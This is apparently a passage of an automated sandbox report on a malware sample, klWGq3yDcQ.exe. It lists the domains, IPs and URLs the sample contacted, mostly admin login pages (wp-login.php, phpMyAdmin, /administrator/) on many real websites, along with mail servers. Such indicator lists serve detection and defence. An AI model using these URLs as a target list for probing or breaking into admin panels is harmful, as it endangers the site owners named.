                                                              kappablu.de
                                                              		81.169.145.157
                                                              		truetrueunknown
                                                              wasserman.us
                                                              		216.250.121.106
                                                              		truetrue
                                                                		unknown
                                                                harasduberry.com
                                                                		99.81.150.60
                                                                		truetrue
                                                                  		unknown
                                                                  alt4.aspmx.l.google.com
                                                                  		142.250.153.26
                                                                  		truefalse
                                                                    		high
                                                                    smtp.secureserver.net
                                                                    		68.178.213.203
                                                                    		truefalse
                                                                      		high
                                                                      americanrecords.it
                                                                      		109.168.109.224
                                                                      		truetrue
                                                                        		unknown
                                                                        mx2.mailserver.it
                                                                        		212.97.32.100
                                                                        		truetrue
                                                                          		unknown
                                                                          mx2.supremebox.com
                                                                          		198.23.53.42
                                                                          		truetrue
                                                                            		unknown
                                                                            krkconcord-com.mail.protection.outlook.com
                                                                            		104.47.74.10
                                                                            		truefalse
                                                                              		high
                                                                              rdelealtad.com
                                                                              		15.197.142.173
                                                                              		truetrue
                                                                                		unknown
                                                                                gmailvz.com
                                                                                		3.33.130.190
                                                                                		truetrue
                                                                                  		unknown
                                                                                  getquipu.com
                                                                                  		15.236.29.106
                                                                                  		truefalse
                                                                                    		high
                                                                                    mx1.improvmx.com
                                                                                    		15.236.236.160
                                                                                    		truetrue
                                                                                      		unknown
                                                                                      ftp.bunasta.eu
                                                                                      		192.168.1.13
                                                                                      		truefalse
                                                                                        		unknown
                                                                                        gethsemane.org
                                                                                        		75.118.8.65
                                                                                        		truetrue
                                                                                          		unknown
                                                                                          grg17geblergasse.at
                                                                                          		81.19.159.64
                                                                                          		truefalse
                                                                                            		high
                                                                                            vivanettv.co.ke
                                                                                            		104.247.74.107
                                                                                            		truetrue
                                                                                              		unknown
                                                                                              mx1.jimdo.com
                                                                                              		173.203.187.1
                                                                                              		truefalse
                                                                                                		high
                                                                                                midcapfunding.com
                                                                                                		15.197.142.173
                                                                                                		truetrue
                                                                                                  		unknown
                                                                                                  hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com
                                                                                                  		3.94.41.167
                                                                                                  		truefalse
                                                                                                    		high
                                                                                                    unaj.edu.pe
                                                                                                    		15.235.14.141
                                                                                                    		truetrue
                                                                                                      		unknown
                                                                                                      ecolandeck-at0i.mail.protection.outlook.com
                                                                                                      		52.101.68.0
                                                                                                      		truefalse
                                                                                                        		high
                                                                                                        rechagricola.com.br
                                                                                                        		18.229.0.171
                                                                                                        		truetrue
                                                                                                          		unknown
                                                                                                          mx00.1and1.com
                                                                                                          		74.208.5.3
                                                                                                          		truefalse
                                                                                                            		high
                                                                                                            capforge.com
                                                                                                            		67.205.16.72
                                                                                                            		truetrue
                                                                                                              		unknown
                                                                                                              esoft-academy.mail.eo.outlook.com
                                                                                                              		52.101.132.30
                                                                                                              		truefalse
                                                                                                                		high
                                                                                                                web-hp.prod.jimdo.systems
                                                                                                                		34.240.130.5
                                                                                                                		truefalse
                                                                                                                  		unknown
                                                                                                                  mail.locandafrancigena.it
                                                                                                                  		144.76.107.16
                                                                                                                  		truetrue
                                                                                                                    		unknown
                                                                                                                    c47ab644ec7e3f14.mx2.emailprofi.seznam.cz
                                                                                                                    		77.75.77.146
                                                                                                                    		truefalse
                                                                                                                      		high
                                                                                                                      www.hugedomains.com
                                                                                                                      		104.26.7.37
                                                                                                                      		truefalse
                                                                                                                        		high
                                                                                                                        alt1.aspmx.l.google.com
                                                                                                                        		209.85.202.27
                                                                                                                        		truefalse
                                                                                                                          		high
                                                                                                                          ALT2.ASPMX.L.GOOGLE.com
                                                                                                                          		64.233.184.26
                                                                                                                          		truefalse
                                                                                                                            		high
                                                                                                                            lumaruniformes.com
                                                                                                                            		162.241.62.220
                                                                                                                            		truetrue
                                                                                                                              		unknown
                                                                                                                              coralparkchristian.org
                                                                                                                              		162.210.96.117
                                                                                                                              		truetrue
                                                                                                                                		unknown
                                                                                                                                ftp.quipuapp.com
                                                                                                                                		15.236.29.106
                                                                                                                                		truetrue
                                                                                                                                  		unknown
                                                                                                                                  alt3.aspmx.l.google.com
                                                                                                                                  		142.250.27.27
                                                                                                                                  		truefalse
                                                                                                                                    		high
                                                                                                                                    mx.b.locaweb.com.br
                                                                                                                                    		177.153.23.242
                                                                                                                                    		truefalse
                                                                                                                                      		unknown
                                                                                                                                      mx.mail-data.net
                                                                                                                                      		143.244.202.96
                                                                                                                                      		truetrue
                                                                                                                                        		unknown
                                                                                                                                        edgewater.group
                                                                                                                                        		104.200.30.31
                                                                                                                                        		truetrue
                                                                                                                                          		unknown
                                                                                                                                          ce-logic.com
                                                                                                                                          		54.83.33.36
                                                                                                                                          		truetrue
                                                                                                                                            		unknown
                                                                                                                                            samsongroup.in.tmes.trendmicro.eu
                                                                                                                                            		18.185.115.147
                                                                                                                                            		truefalse
                                                                                                                                              		high
                                                                                                                                              federwild.at
                                                                                                                                              		185.183.156.218
                                                                                                                                              		truetrue
                                                                                                                                                		unknown
                                                                                                                                                upn-pe.mail.protection.outlook.com
                                                                                                                                                		52.101.40.24
                                                                                                                                                		truefalse
                                                                                                                                                  		high
                                                                                                                                                  t1eng.com
                                                                                                                                                  		3.234.162.143
                                                                                                                                                  		truetrue
                                                                                                                                                    		unknown
                                                                                                                                                    mx2.zoho.com
                                                                                                                                                    		136.143.191.44
                                                                                                                                                    		truefalse
                                                                                                                                                      		high
                                                                                                                                                      ftp.viidelta.com
                                                                                                                                                      		89.31.143.1
                                                                                                                                                      		truetrue
                                                                                                                                                        		unknown

                                                                                                                                                        Contacted URLs

                                                                                                                                                        NameMaliciousAntivirus DetectionReputation
                                                                                                                                                        https://unaj.edu.pe/admintrue
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://avient.com/admin.phptrue
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.prettypollycleaning.ae/adminfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.perrisesd.org/administrator/index.phpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://americanrecords.it/admin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://prettypollycleaning.ae/administrator/index.phpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://gccb.co.in/phpMyAdmin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://rochester-gauges.be/admin.phptrue
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://kappablu.de/wp-login.phptrue
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://bvhrs.com/phpmyadmin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://srmist.edu.in/pma/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://my.calvary.qld.edu.au/saml/index.php?page=%2Fadministrator%2Findex.phptrue
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://unaj.edu.pe/phpMyAdmin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://midcapfunding.com/pma/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://gruporegiosafety.com/wp-login.phptrue
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://www.beachrecruitment.com/phpMyAdmin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://gatewaytoearlylearning.com/phpMyAdmin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://samson.pe/pma/false
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://leeberg.dk/phpmyadmin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://ce-logic.com/phpMyAdmin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://dstaq.com/administrator/index.phptrue
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://knu.ac.in/wp-admin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://rechagricola.com.br/phpmyadmin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://webstamp.ca/phpMyAdmin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://rochester-gauges.be/pma/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://tiswheels.com/administrator/index.phptrue
                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                        		unknown
                                                                                                                                                        http://robinsonland.com/wp-admin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://gruporegiosafety.com/phpMyAdmin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://jamiesonmullin.com/admintrue
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://kappablu.de/phpmyadmin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://midcapfunding.com/phpmyadmin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://federwild.at/phpMyAdmin/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://bvhrs.com/pma/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.grg17geblergasse.at/admin.phpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://srmist.edu.in/PhpMyAdmin/true
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://knu.ac.in/administrator/index.phptrue
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://gmailvz.com/phpmyadmin/true
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://ceuandalucia.es/PhpMyAdmin/true
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://edgewater.group/wp-login.phptrue
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://gmailvz.com/admintrue
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://eco-landeck.at/phpmyadmin/false
                                                                                                                                                            		high
                                                                                                                                                            https://unaj.edu.pe/wp-login.phptrue
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://gasp-ga.com/administrator/index.phptrue
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://linkan-group.com/wp-admin/true
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://financefast.com.br/phpMyAdmin/false
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://ce-logic.com/admin/true
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://www.knu.ac.in/admin.phptrue
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://awb-apparatebau.de/pma/true
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://rdelealtad.com/administrator/index.phptrue
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://lumaruniformes.com/PhpMyAdmin/true
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://esoft.academy/wp-login.phpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://awb-apparatebau.de/administrator/true
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://edgewater.group/administrator/true
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://viidelta.com/wp-admin/true
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://gasp-ga.com/administrator/true
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://lumaruniformes.com/admintrue
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://grg17geblergasse.at/admin.phpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://lumaruniformes.com/wp-login.php?redirect_to=https%3A%2F%2Flumaruniformes.com%2Fwp-admin%2F&reauth=1true
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://ce-logic.com/admin.phptrue
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://octetpowers.in/phpMyAdmin/true
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://viidelta.com/admin/true
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://student.debritto.sch.id/phpmyadmin/true
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://himontessori.com/admin/true
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://srmist.edu.in/admin.phptrue
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://tcetmumbai.in/administrator/index.phpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://unaj.edu.pe/PhpMyAdmin/true
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://edgewater.group/administrator/index.phptrue
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown

                                                                                                                                                                URLs from Memory and Binaries

                                                                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                http://formacion.talentius.com/klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://engel-firm.com/wp-login.php?action=lostpasswordklWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://townshipnjr.com/phpmyadmin/klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://lwindowelive.com/wp-admin/klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://micro-design.com/wp-admin/js/user-profile.min.js?ver=6.1.1klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://students.kasralainy.edu.eg/administrator/index.phpcaklWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://tradeavenida.com/wp-content/uploads/2022/06/websit-logo-footer.pngklWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://sofia-communications.com/klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.karinshobbyfotografie.nl/index.htmlklWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://www.youtube.com/channel/UCR8Y1oz_wfVPTUpgFwsX9DgklWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004139000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://my.calvary.qld.edu.au/pma/Admin/-klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://www.boldgrid.com/w3-total-cache/klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CE9000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886296265.00000000040CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://talentius.com/comments/feed/klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://adm.uksw.edu/phpMyAdmin/klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.maxiv.lu.se/wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212efklWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004380000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://yahoo.comfreezed/phpmyadmin/klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://talentius.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?vklWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://gccb.co.in/wp-content/uploads/2023/05/favicon.pngklWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://tradeavenida.com/product-category/toys-games/klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://gethsemane.org/phpmyadmin/YklWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://paintd.plus.com/phpmyadmin/klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://www.beachrecruitment.com/index.php/cms_categorie/94677/bb/1/id/94677klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://micro-design.com/wp-login.php?action=lostpasswordklWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://ww38.ondania.com/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMDN8fHx8fHw2NTYyZGVkMzNiklWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://img1.wsimg.com/parking-lander/static/css/main.ba077a97.cssklWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004385000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://www.linkedin.com/company/beach-recruitment-&amp;-career/?originalSubdomain=nlklWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://samson.pe/feed/klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://ondania.com/PhpMyAdmin/yklWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004067000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://x1.i.lencr.org/klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://samson.pe/#/schema/logo/image/klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://nwzimg.wezhan.net/static-js/page404.jsklWGq3yDcQ.exe, 00000001.00000002.2885555706.000000000400D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://certs.godaddy.com/repository//CN=GoklWGq3yDcQ.exe, 00000001.00000002.2887067492.000000000433E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://image.jimcdn.com/app/cms/image/transf/dimension=350x10000:format=png/path/s5310617dc1962275/klWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high

                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                  Public IPs

                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                  162.250.126.5
                                                                                                                                                                                  		directlendersllc.comUnited States
                                                                                                                                                                                  		19318IS-AS-1USfalse
                                                                                                                                                                                  74.220.219.189
                                                                                                                                                                                  		mail.himontessori.comUnited States
                                                                                                                                                                                  		46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                                  52.101.42.9
                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                  52.101.42.6
                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                                                                                                  194.55.13.50
                                                                                                                                                                                  		unknownGermany
                                                                                                                                                                                  		197540NETCUP-ASnetcupGmbHDEfalse
                                                                                                                                                                                  52.101.42.4
                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                                                                                                  15.236.236.160
                                                                                                                                                                                  		mx1.improvmx.comUnited States
                                                                                                                                                                                  		16509AMAZON-02UStrue
                                                                                                                                                                                  212.159.8.200
                                                                                                                                                                                  		mx.avasin.plus.netUnited Kingdom
                                                                                                                                                                                  		6871PLUSNETUKInternetServiceProviderGBfalse
                                                                                                                                                                                  34.240.130.5
                                                                                                                                                                                  		web-hp.prod.jimdo.systemsUnited States
                                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                                  162.241.24.104
                                                                                                                                                                                  		mail.tradeavenida.comUnited States
                                                                                                                                                                                  		46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                                  212.97.32.100
                                                                                                                                                                                  		mx2.mailserver.itItaly
                                                                                                                                                                                  		5602AS-IRIDEOS-KPITtrue
                                                                                                                                                                                  172.67.150.14
                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                  68.168.209.252
                                                                                                                                                                                  		bvhrs.comUnited States
                                                                                                                                                                                  		19318IS-AS-1UStrue
                                                                                                                                                                                  81.169.145.157
                                                                                                                                                                                  		kappablu.deGermany
                                                                                                                                                                                  		6724STRATOSTRATOAGDEtrue
                                                                                                                                                                                  104.247.74.107
                                                                                                                                                                                  		vivanettv.co.keUnited States
                                                                                                                                                                                  		22611IMH-WESTUStrue
                                                                                                                                                                                  191.6.210.8
                                                                                                                                                                                  		web202.uni5.netBrazil
                                                                                                                                                                                  		28299IPV6InternetLtdaBRtrue
                                                                                                                                                                                  216.250.121.106
                                                                                                                                                                                  		wasserman.usUnited States
                                                                                                                                                                                  		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                  144.76.107.16
                                                                                                                                                                                  		mail.locandafrancigena.itGermany
                                                                                                                                                                                  		24940HETZNER-ASDEtrue
                                                                                                                                                                                  117.20.63.148
                                                                                                                                                                                  		student.debritto.sch.idIndonesia
                                                                                                                                                                                  		23951CITRA-AS-IDPTJEMBATANCITRANUSANTARAIDtrue
                                                                                                                                                                                  104.47.73.138
                                                                                                                                                                                  		rochestergauges-be02c.mail.protection.outlook.comUnited States
                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                  185.135.132.105
                                                                                                                                                                                  		grantstech.ioFrance
                                                                                                                                                                                  		16347RMI-FITECHFRtrue
                                                                                                                                                                                  81.169.145.74
                                                                                                                                                                                  		awb-apparatebau.deGermany
                                                                                                                                                                                  		6724STRATOSTRATOAGDEtrue
                                                                                                                                                                                  15.235.14.141
                                                                                                                                                                                  		unaj.edu.peUnited States
                                                                                                                                                                                  		71HP-INTERNET-ASUStrue
                                                                                                                                                                                  109.168.109.224
                                                                                                                                                                                  		americanrecords.itItaly
                                                                                                                                                                                  		5602AS-IRIDEOS-KPITtrue
                                                                                                                                                                                  52.206.191.232
                                                                                                                                                                                  		perrisesd.orgUnited States
                                                                                                                                                                                  		14618AMAZON-AESUStrue
                                                                                                                                                                                  164.52.221.51
                                                                                                                                                                                  		gccb.co.inIndia
                                                                                                                                                                                  		17439NETMAGIC-APNetmagicDatacenterMumbaiINtrue
                                                                                                                                                                                  104.21.12.154
                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                  104.26.7.37
                                                                                                                                                                                  		www.hugedomains.comUnited States
                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                  193.203.239.23
                                                                                                                                                                                  		mail.grantstech.ioFrance
                                                                                                                                                                                  		16347RMI-FITECHFRtrue
                                                                                                                                                                                  185.230.63.171
                                                                                                                                                                                  		dstaq.comIsrael
                                                                                                                                                                                  		58182WIX_COMILtrue
                                                                                                                                                                                  133.130.97.143
                                                                                                                                                                                  		recv1.erinn.bizJapan7506INTERQGMOInternetIncJPtrue
                                                                                                                                                                                  184.106.54.2
                                                                                                                                                                                  		mx2.emailsrvr.comUnited States
                                                                                                                                                                                  		19994RACKSPACEUStrue
                                                                                                                                                                                  13.32.208.27
                                                                                                                                                                                  		d3i1ioguzwkpen.cloudfront.netUnited States
                                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                                  185.154.212.10
                                                                                                                                                                                  		dkrs.gov.uaUkraine
                                                                                                                                                                                  		42331FREEHOSTUAtrue
                                                                                                                                                                                  15.222.16.209
                                                                                                                                                                                  		d405642.b.ess.ca.barracudanetworks.comUnited States
                                                                                                                                                                                  		16509AMAZON-02UStrue
                                                                                                                                                                                  162.210.96.117
                                                                                                                                                                                  		coralparkchristian.orgUnited States
                                                                                                                                                                                  		32748STEADFASTUStrue
                                                                                                                                                                                  72.167.58.161
                                                                                                                                                                                  		mail.webstamp.caUnited States
